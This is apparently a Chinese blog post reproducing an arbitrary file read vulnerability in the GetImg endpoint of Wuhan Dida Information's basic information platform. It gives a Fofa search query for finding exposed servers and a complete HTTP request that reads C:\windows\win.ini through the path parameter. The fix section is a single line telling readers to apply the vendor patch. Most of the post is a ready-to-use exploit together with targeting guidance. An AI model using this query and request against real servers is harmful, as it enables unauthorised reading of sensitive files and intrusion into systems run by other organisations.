地大信息-基础信息平台 GetImg 任意文件读取漏洞复现

0x01 漏洞描述:

武汉地大信息工程股份有限公司(简称"地大信息")是一家以地理信息系统(GIS)为核心技术的信息技术服务企业。该公司主要提供包括但不限于空间数据采集与处理、地理信息系统开发、软件定制开发等服务。

旗下的基础信息平台存在任意文件上传漏洞、任意文件读取漏洞,攻击者可通过该漏洞获取服务器权限,获取主机敏感信息。

0x02 搜索语句:

Fofa:body="/SystemManage/BaseProject" || title=="基础信息平台"

0x03 漏洞复现:

复制代码
GET /SystemManage/BaseProject/GetImg?path=C:\windows\win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close

0x04 修复建议:

厂商已发布补丁 请及时修复

相关推荐
宋浮檀s13 小时前
春秋云镜——CVE-2020-25540
网络·安全·web安全
郑洁文13 小时前
面向Web安全的Python渗透测试系统设计与实现
python·安全·web安全
Latticy13 小时前
内网渗透-Windows RDP凭证的抓取和密码破解
网络·安全·网络安全·内网渗透·内网
亚信安全官方账号16 小时前
AISTrustOne鸿蒙版安全方案 让终端防护“内生”力量觉醒
安全·华为·harmonyos
汽车仪器仪表相关领域16 小时前
南华 NHA-604/605 汽车排放气体测试仪:国六b全适配高精度便携检测设备
大数据·人工智能·功能测试·深度学习·安全·fpga开发·压力测试
xixixi7777716 小时前
危机与防御并存:ShadowModel 供应链投毒爆发,PQC 国密融合筑牢 AI 量子安全底座
大数据·人工智能·安全·ai·供应链·后量子密码·模型投毒
woniu_buhui_fei16 小时前
常见的网络攻击
web安全
wengqidaifeng17 小时前
2. OpenClaw 架构落地指南:部署、渠道集成与安全边界全解
安全·ai·架构·openclaw
网络研究院18 小时前
即将过期的安全启动证书将如何影响 Windows 设备
安全·微软·系统·漏洞·硬件